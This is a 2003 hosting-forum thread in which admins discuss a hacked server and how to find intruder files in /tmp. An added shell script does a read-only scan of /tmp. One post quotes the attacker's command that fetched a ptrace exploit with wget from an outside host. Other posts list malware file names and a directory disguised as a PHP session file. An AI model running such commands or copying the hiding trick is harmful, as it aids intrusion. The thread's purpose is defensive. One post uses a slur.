#16 (permalink)  
Old 12-24-2003, 12:49 AM
Registered User
 
Join Date: Aug 2001
Posts: 111
Diatone
http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.
  #17 (permalink)  
Old 12-24-2003, 01:42 AM
Registered User
 
Join Date: Feb 2003
Posts: 301
compunet2
Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol
  #18 (permalink)  
Old 12-24-2003, 04:17 AM
Registered User
 
Join Date: Aug 2002
Posts: 108
ivaserver
My server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs.
  #19 (permalink)  
Old 12-24-2003, 06:13 AM
Registered User
 
Join Date: Aug 2002
Posts: 108
ivaserver
deleted

Last edited by ivaserver; 12-24-2003 at 07:49 AM.
  #20 (permalink)  
Old 12-29-2003, 03:47 PM
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org
Quote:
Originally posted by brumie
oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unusual files/directory there
but it'll be good if u reload the OS and get kernel update and find some threads about securing whm/cpanel, i found it very useful

What counts as weird or unusual files/dirs?
  #21 (permalink)  
Old 12-29-2003, 10:59 PM
Registered User
 
Join Date: Dec 2003
Posts: 40
brumie
Quote:
What counts as weird or unusual files/dirs?

files are executable

on the xmas day, my friend's server almost got hacked
u should check that weird file:

so far we found this kind of files on several servers /tmp:
.xcgi
r00t
w00t
xp
xmas
gift
r0nin
anyname.c --> cc code compile able

i'm sure there must be lots way they trying to hack
sometimes they also mk directory name pretending like it was a session files

-rw------- 1 nobody nobody 0 Dec 29 10:51 sess_f7139ec439e5ad737c9c22723b140123
drwxr-xr-x 2 nobody nobody 4096 Dec 29 16:41 sess_f7139ec439e5ad737c9c22723b140xxx
-rw------- 1 nobody nobody 435 Dec 28 23:42 sess_fa205a6f3a4b7a5d3a3affb915522456

see the permission drwxr-xr-x
that's directory, the man that got our server was did with that way, i can't believe when i'm enter that directory and found many executable files there

anyway that was little story of my nightmares, i'm moving to another provider that helped me lots securing my box and watching like hawk
oh yeah i can sleep better....

suggestion: search thread on this forum about secure your box

set tmp with noexec:
http://forums.ev1servers.net/showthr...threadid=27771

correct me if i'm wrong
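The /tmp checks brumie describes above (executable files, C source, dot-files, and a `sess_*` name that is a directory rather than a session file), together with the noexec suggestion, as an added example that is not part of the original thread. The function names `scan_tmp`, `has_noexec` and `tag` are illustrative, and the script only reads; it changes nothing.

```sh
#!/bin/sh
# Added example: read-only triage of a temp directory using the indicators
# from the post above. Function names are illustrative, not from the thread.

# Prefix each path read on stdin with a reason tag.
# Paths containing newlines are not handled.
tag() { while IFS= read -r p; do printf '%s\t%s\n' "$1" "$p"; done; }

# scan_tmp DIR: print "reason<TAB>path" for each suspicious entry.
scan_tmp() (
    dir="${1:-/tmp}"
    # PHP session files are regular files; a sess_* directory is a disguise.
    find "$dir" -name 'sess_*' ! -type f | tag fake-session
    # Regular files with any execute bit set.
    find "$dir" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) | tag executable
    # C source dropped for compiling on the box.
    find "$dir" -type f -name '*.c' | tag c-source
    # Dot-prefixed entries such as the .xcgi named in the post.
    find "$dir" -name '.*' ! -path "$dir" | tag hidden
)

# has_noexec MOUNTPOINT [MOUNTS_FILE]: succeed only if MOUNTPOINT is its own
# mount and carries the noexec option (field layout as in /proc/mounts).
has_noexec() {
    awk -v mp="$1" '$2 == mp { found = ($4 ~ /(^|,)noexec(,|$)/) }
                    END { exit !found }' "${2:-/proc/mounts}"
}

# When a directory is given on the command line, report on it.
if [ "$#" -gt 0 ]; then
    scan_tmp "$1"
    if has_noexec "$1"; then
        echo "$1 is mounted noexec"
    else
        echo "$1 is not a separate noexec mount"
    fi
fi
```

Run it as root so unreadable subdirectories are not skipped, and treat the output as leads to inspect: legitimate software also leaves dot-files and the occasional executable in /tmp.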
  #22 (permalink)  
Old 12-30-2003, 12:34 AM
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org
Oh, ok. I wasn't sure if you meant obviously unusual files, or computer nerd obvious. Thanks.
  #23 (permalink)  
Old 12-30-2003, 06:51 AM
Registered User
 
Join Date: Dec 2002
Posts: 21
micron
Re: new server got hacked

Quote:
Originally posted by brumie
Code:
...
wget www.viperhaxu.hpg.com.br/ptrace
...

Here are your hackers. Looks like 13 year olds.
  #24 (permalink)  
Old 12-30-2003, 09:29 AM
Registered User
 
Join Date: Jul 2003
Location: Seattle Washington
Posts: 603
B12Org
That file that you referenced is an empty text file. Looks like whatever it was, it's gone now. My experience was with a group calling themselves "techteam". Some hackers they were, they had to make their web page with FrontPage.
  #25 (permalink)  
Old 04-29-2004, 12:00 PM
Registered User
 
Join Date: Apr 2004
Posts: 2
mc303
excellent resource of knowledge
Thank you